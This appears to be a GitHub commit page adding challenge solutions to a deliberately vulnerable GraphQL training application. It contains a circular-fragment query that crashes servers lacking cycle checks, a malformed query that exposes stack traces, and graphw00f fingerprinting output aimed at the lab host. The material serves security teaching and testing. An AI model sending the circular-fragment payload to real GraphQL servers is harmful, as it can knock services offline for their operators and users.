-
Notifications
You must be signed in to change notification settings - Fork 300
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #43 from dolevf/update-solutions
Add solutions
- Loading branch information
Showing
7 changed files
with
93 additions
and
23 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,42 @@ | ||
| <!-- Start --> | ||
| <h3 style="color:purple" id="dos-circular-fragment"><b>Denial of Service :: Circular Fragment</b></h3> | ||
| <hr /> | ||
| <h5>Problem Statement</h5> | ||
| <p> | ||
| The GraphQL API allows creating circular fragments, such that two fragments are cross-referencing eachother. | ||
| When a Spread Operator (<code>...</code>) references a fragment, which in return references a 2nd fragment that leads to the former fragment, may cause a recursive loop and crash the server. | ||
| </p> | ||
| <h5>Resources</h5> | ||
| <ul> | ||
| <li> | ||
| <a href="https://spec.graphql.org/October2021/#sec-Fragment-spreads-must-not-form-cycles" target="_blank"> | ||
| <i class="fa fa-newspaper"></i> GraphQL Specification - Fragments Must Not Form Cycles | ||
| </a> | ||
| </li> | ||
| <li> | ||
| <a href="https://github.com/dolevf/graphql-cop" target="_blank"> | ||
| <i class="fa fa-shield-alt"></i> GraphQL Cop - Security Auditing Tool for GraphQL | ||
| </a> | ||
| </li> | ||
| </ul> | ||
| <h5>Exploitation Solution <button class="reveal" onclick="reveal('sol-dos-circular-fragment')">Show</button></h5> | ||
| <div id="sol-dos-circular-fragment" style="display:none"> | ||
| <pre class="bash"> | ||
| query { | ||
| ...A | ||
| } | ||
|
|
||
| fragment A on PasteObject { | ||
| content | ||
| title | ||
| ...B | ||
| } | ||
|
|
||
| fragment B on PasteObject { | ||
| content | ||
| title | ||
| ...A | ||
| } | ||
| </pre> | ||
| </div> | ||
| <!-- End --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,20 @@ | ||
| <!-- Start --> | ||
| <h3 style="color:purple" id="info-stacktrace"><b>Information Disclosure :: Stack Trace Errors</b></h3> | ||
| <hr /> | ||
| <h5>Problem Statement</h5> | ||
| <p> | ||
| The dedicated GraphiQL API endpoint <code>/graphiql</code> throws stack traces and debugging messages upon erroneous queries. | ||
| </p> | ||
| <h5>Exploitation Solution <button class="reveal" onclick="reveal('sol-info-stacktrace')">Show</button></h5> | ||
| <div id="sol-info-stacktrace" style="display:none"> | ||
| <pre class="bash"> | ||
| # Navigate to /graphiql | ||
| # Query using invalid syntax and observe the response. | ||
| query { | ||
| pastes { | ||
| conteeeent | ||
| } | ||
| } | ||
| </pre> | ||
| </div> | ||
| <!-- End --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -48,6 +48,9 @@ <h1 class="mt-4">Challenge Solutions</h1> | |
| <li> | ||
| <a href="#dos-aliases">Aliases based Attack</a> | ||
| </li> | ||
| <li> | ||
| <a href="#dos-circular-fragment">Circular Fragment</a> | ||
| </li> | ||
| </ul> | ||
| </li> | ||
|
|
||
|
|
@@ -66,6 +69,9 @@ <h1 class="mt-4">Challenge Solutions</h1> | |
| <li> | ||
| <a href="#info-ssrf">Server Side Request Forgery</a> | ||
| </li> | ||
| <li> | ||
| <a href="#info-stacktrace">Stack Trace Errors</a> | ||
| </li> | ||
| </ul> | ||
| </li> | ||
| <li> | ||
|
|
@@ -138,7 +144,7 @@ <h4>Legend</h4> | |
| <br> | ||
| <small style="color:grey"><i class="fa fa-info"></i> Some solutions include code snippets that are written in Python and use the requests library for HTTP requests.</small> | ||
| </p> | ||
|
|
||
| <h3 style="color:purple"><b>Getting Started</b></h3> | ||
| <hr /> | ||
| <p>The first essential step in every security test is to gain a bit of insight into the technology the remote server is using. By knowing the technologies in use, you can start building up a plan how to attack the application or the underlying infrastructure.</p> | ||
|
|
@@ -148,27 +154,27 @@ <h3 style="color:purple" id="recon-detection"><b>Detecting GraphQL</b></h3> | |
| <p>Detecting where GraphQL lives is pretty trivial, there are common places where you would typically see a graphql endpoint. For example, <i>/graphql</i>, <i>/v1/graphql</i>, etc.</p> | ||
| <p>Point graphw00f at DVGA to figure out where GraphQL lives:</p> | ||
| <p><b><pre> | ||
| $> python3 graphw00f.py -d -t http://localhost:5013/graphql | ||
| +-------------------+ | ||
| | graphw00f | | ||
| +-------------------+ | ||
| *** *** | ||
| ** *** | ||
| ** ** | ||
| +--------------+ +--------------+ | ||
| | Node X | | Node Y | | ||
| +--------------+ +--------------+ | ||
| *** *** | ||
| ** ** | ||
| ** ** | ||
| +------------+ | ||
| | Node Z | | ||
| +------------+ | ||
| $> python3 graphw00f.py -d -t http://localhost:5013/graphql | ||
| +-------------------+ | ||
| | graphw00f | | ||
| +-------------------+ | ||
| *** *** | ||
| ** *** | ||
| ** ** | ||
| +--------------+ +--------------+ | ||
| | Node X | | Node Y | | ||
| +--------------+ +--------------+ | ||
| *** *** | ||
| ** ** | ||
| ** ** | ||
| +------------+ | ||
| | Node Z | | ||
| +------------+ | ||
|
|
||
| graphw00f - v1.0.3 | ||
| graphw00f - v1.0.3 | ||
| The fingerprinting tool for GraphQL | ||
| Dolev Farhi ([email protected]) | ||
|
|
||
| Checking http://dvga.example.local:5013/graphql | ||
| [*] Found GraphQL at http://dvga.example.local:5013/graphql | ||
| [*] You can now try and fingerprint GraphQL using: graphw00f.py -t http://dvga.example.local:5013/graphql | ||
|
|
@@ -181,7 +187,7 @@ <h3 style="color:purple" id="recon-fingerprinting"><b>Fingerprinting GraphQL</b> | |
| <p>Point graphw00f at DVGA to figure out what technology it's running.</p> | ||
| <p><b><pre> | ||
| $> python3 graphw00f.py -t http://dvga.example.local:5013/graphql -f | ||
|
|
||
| [*] Checking if GraphQL is available at http://dvga.example.local:5013/graphql... | ||
| [*] Found GraphQL... | ||
| [*] Attempting to fingerprint... | ||
|
|
||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1 +1 @@ | ||
| VERSION = '2.0.5' | ||
| VERSION = '2.0.6' |